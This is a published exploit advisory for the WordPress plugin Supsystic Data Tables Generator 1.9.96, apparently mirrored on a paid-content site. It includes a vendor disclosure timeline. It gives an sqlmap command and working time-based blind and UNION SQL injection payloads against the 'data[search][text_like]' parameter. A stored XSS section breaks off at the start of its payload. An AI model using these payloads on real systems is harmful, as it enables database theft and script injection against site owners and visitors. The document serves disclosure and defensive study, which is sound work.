49543_wordpress插件supsystic数据表生成器1.9.96-多个漏洞-PHP WebApps exploit.txt

02714

详情

  此处内容已隐藏,请付费后查看

# Exploit Title: WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities
# Date: 24/07/2020
# Exploit Author: Erik David Martin
# Vendor Homepage: https://supsystic.com/
# Software Link: https://downloads.wordpress.org/plugin/data-tables-generator-by-supsystic.1.9.96.zip
# Category: Web Application
# Version: 1.9.96
# Tested on: Ubuntu 16.04.6 LTS / WordPress 5.4.2  # 25/07 2020: Vendor notified
# 27/07 2020: Vendor requested detailed information
# 27/07 2020: Information provided
# 07/08 2020: Nudged vendor. No reply
# 22/08 2020: Nudged vendor. No reply
# 04/10 2020: Nudged vendor. No reply
# 29/11 2020: WordPress Plugin Security team contacted
# 08/12 2020: Vulnerability fixed  ##################################
 SQLi
##################################  # 1. Description  The POST parameter "data[search][text_like]" does not sanitize user input when searching for data.  # 2. Proof of Concept (PoC)  Use ZAP/Burp to capture the web request when searching for data and save it to request.txt
Referer: http://192.168.0.49/wp-admin/admin.php?page=supsystic-tables  sqlmap -r request.txt --dbms=mysql -p data[search][text_like]  Parameter: data[search][text_like] (POST)
 Type: time-based blind
 Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' AND (SELECT 4736 FROM (SELECT(SLEEP(5)))iAJy) AND 'iAVl'='iAVl&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables  Type: UNION query
 Payload: route[module]=tables&route[action]=getListForTbl&route[nonce]=5fc3d66b71&data[search][text_like]=t' UNION ALL SELECT CONCAT(0x7170707871,0x487a436e5175474a64617446465349535248737249775445424671545a557367704b61424e6d6545,0x7178786b71),NULL-- -&data[_search]=false&data[nd]=1595781752940&data[rows]=10&data[page]=1&data[sidx]=id&data[sord]=desc&action=supsystic-tables  ##################################
 Stored XSS
##################################  # 1. Description  The "Editor" tab under the "Tables" section is vulnerable to stored XSS. It is possible to store XSS in all input fields as the code does not sanitize any of the user input.  # 2. Proof of Concept (PoC)  Enter the following payload into any input field:	">